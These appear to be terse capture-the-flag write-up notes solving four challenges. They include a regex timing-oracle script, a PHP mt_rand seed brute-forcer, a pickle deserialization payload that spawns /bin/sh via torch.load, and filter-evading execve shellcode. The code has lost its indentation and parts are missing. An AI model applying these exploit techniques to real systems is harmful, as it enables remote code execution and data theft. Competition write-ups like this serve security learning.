time based leaking flag
import requests
import string
from tqdm import tqdm
charset = string.ascii_letters + string.digits + "{}_'!,="
url = "http://matchmaker-2.play.hfsc.tf:12345/?x="
flag = "midnight{"
for i in tqdm(range(30)):
stats = [0 for _ in range(len(charset))]
for c in charset:
res = requests.get(f"{url}^{flag}{c}{'(.*)'*2000}$")
time = float(res.text.split("</strong>")[1].split("<br />")[0])
stats[charset.index(c)] = time
maxi = -1
max = -1
for i,s in enumerate(stats):
if(s > max):
max = s
maxi = i
flag += charset[maxi]
if(flag[-1] == '}'):
use IDA to reverse this golang binary
found weird string s0me0ne_sh0u1d_f4cT_cH3ck_tH3s3_AIs
the char of the flag is used as the seed of random generator
the generator will generator the number between min
~ max
and will prevent the number inside the range gap_start
~ gap_end - 1
. All the params is unknown
we can requests many times and make a statistics, than we will find the param as follow:
$min = 1;
$max = 256;
$gap_start = 100;
$gap_end = 150;
statistics script:
import requests
from tqdm import tqdm
stats = [0 for _ in range(260)]
for i in tqdm(range(20)):
res = requests.get("http://mtrandom-1.play.hfsc.tf:51237/?generate_samples=1")
data = res.json()["samples"]
for d in data:
stats[d] += 1
for i,s in enumerate(stats):
print(i, s)
first, we can find the common seed by scanning range 0 ~ 10000. Then we can scan each char one-by-one in the range 0x30 ~ 0x80
function non_continuous_sample($min, $max, $gap_start, $gap_end) {
$rand_num = mt_rand($min, $max - ($gap_end - $gap_start));
if ($rand_num >= $gap_start) {
$rand_num += ($gap_end - $gap_start);
return $rand_num;
$min = 1;
$max = 256;
$gap_start = 100;
$gap_end = 150;
$flag = "midnight{";
$flagnum = [];
foreach (str_split($flag) as $char) {
$flagnum[] = ord($char);
// $sample = [241,3,36,165,3,89,96,170,199,241,174,165,36,82,170,96,160,82,89,97,2,51];
$sample = [15,84,189,77,84,39,218,38,253,15,170,77,189,219,38,218,55,219,39,186,33,74];
for ($seed=0; $seed < 10000; $seed++) {
# code...
$i = 0;
for (; $i < count($flagnum); $i++) {
# code...
mt_srand($seed + $flagnum[$i]);
if(non_continuous_sample($min, $max, $gap_start, $gap_end) != $sample[$i])
if($i == count($flagnum))
echo $seed . "\n";
for($ct=count($flagnum); $ct < count($sample); $ct++)
for($num=48; $num<128; $num++)
mt_srand($seed + $num);
if(non_continuous_sample($min, $max, $gap_start, $gap_end) == $sample[$ct])
$flag .= chr($num);
echo $flag . "\n";
it use torch.load to load pytorch model
in the documentation, it will use pickle as the default packer to unpack, so pickle deserialization vulnerability may existed
exploit generate script:
import os
import pickle
import base64
class RCE:
def __reduce__(self):
return os.system, ("/bin/sh",)
pk = pickle.dumps(RCE())
# pickle.loads(pk)
input shellcode, but cannot has /
, \x00
, sh
, bin
it can bypass sh
, bin
by or
and shift
for /
, it can bypass by ord(/) - 1
and inc
payload = asm("xor rax, rax")
payload += asm("mov al, 0x3b")
payload += asm("xor rbx, rbx")
payload += asm(f"mov bl, {hex(ord('h'))}")
payload += asm("shl rbx, 8")
payload += asm(f"or rbx, {hex(ord('s'))}")
payload += asm("shl rbx, 8")
payload += asm(f"or rbx, {hex(ord('/') - 1 )}")
payload += asm(f"inc rbx")
payload += asm("shl rbx, 8")
payload += asm(f"or rbx, {hex(ord('n'))}")
payload += asm("shl rbx, 8")
payload += asm(f"or rbx, {hex(ord('i'))}")
payload += asm("shl rbx, 8")
payload += asm(f"or rbx, {hex(ord('b'))}")
payload += asm("shl rbx, 8")
payload += asm(f"or rbx, {hex(ord('/') - 1 )}")
payload += asm(f"inc rbx")
payload += asm("push rbx")
payload += asm("mov rdi, rsp")
payload += asm("xor rsi, rsi")
payload += asm("xor rdx, rdx")
payload += asm("syscall")
copy and paste
following the route, deleting some redacted